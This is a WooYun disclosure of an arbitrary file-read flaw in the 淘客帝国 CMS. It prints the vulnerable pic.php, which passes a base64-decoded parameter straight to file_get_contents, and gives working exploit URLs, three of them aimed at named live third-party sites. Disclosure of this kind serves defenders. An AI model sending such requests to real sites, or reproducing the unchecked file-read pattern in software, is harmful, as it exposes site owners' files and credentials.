当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0116637

漏洞标题:淘客帝国CMS 任意文件读取

相关厂商:淘客帝国

漏洞作者: 路人甲

提交时间:2015-05-28 10:03

修复时间:2015-07-12 10:04

公开时间:2015-07-12 10:04

漏洞类型:任意文件遍历/下载

危害等级:中

自评Rank:10

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-05-28: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-07-12: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

淘客帝国CMS 任意文件读取

详细说明:

注:http://wooyun.org/bugs/wooyun-2015-0116550/trace/4ca5456cb29a089f537c7e6f2743d40b 这个 可以忽略了 因为名字写错了
pic.php:

<?php function url_base64_decode($code) { if($code=="") return ""; $code=str_replace("!",'+',$code);//把所用"+"替换成"!" $code=str_replace(",",'/',$code);//把所用"/"替换成"*" $str=base64_decode($code); return $str; } $url=url_base64_decode($_GET["url"]); if(empty($_GET["url"])){ if(isset($_SERVER["REQUEST_URI"])){ $nav=$_SERVER["REQUEST_URI"]; }else{ if(isset($_SERVER["PATH_INFO"])){ $nav = $_SERVER["PATH_INFO"]; } if(isset($_SERVER["ORIG_PATH_INFO"])){ $nav = $_SERVER["ORIG_PATH_INFO"]; } } if(!isset($nav)){ return; } if(strpos("---".$nav,"?")){ return; } if(strpos("---".$nav,".jpg")==0){ return; } $arr = explode("pic.php/",($nav)); if(Count($arr)>1){ $nav = $arr[1]; } $arr = explode(".jpg",($nav)); if(Count($arr)>1){ $nav = $arr[0]; } $url=url_base64_decode($nav); } header("Content-type: image/jpeg"); echo file_get_contents($url); ?>


发送url:
http://localhost/taodiv6free_installhttps://wooyun-img.oss-cn-beijing.aliyuncs.com/upload/pic.php?url=cGljLnBocA%3D%3D
这个是下载当前页面pic.php 然后保存一下
因为上一个已经说明通用性了
外网举例
http://www.gd-men.com/pic.php?url=cGljLnBocA%3D%3D 保存一下查看文件内容 http://www.hdg138.com/pic.php?url=cGljLnBocA%3D%3D 保存一下查看文件内容 http://demov6.cnmysoft.cn/pic.php?url=cGljLnBocA%3D%3D 保存一下查看文件内容

漏洞证明:

修复方案:

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝


漏洞评价:

评论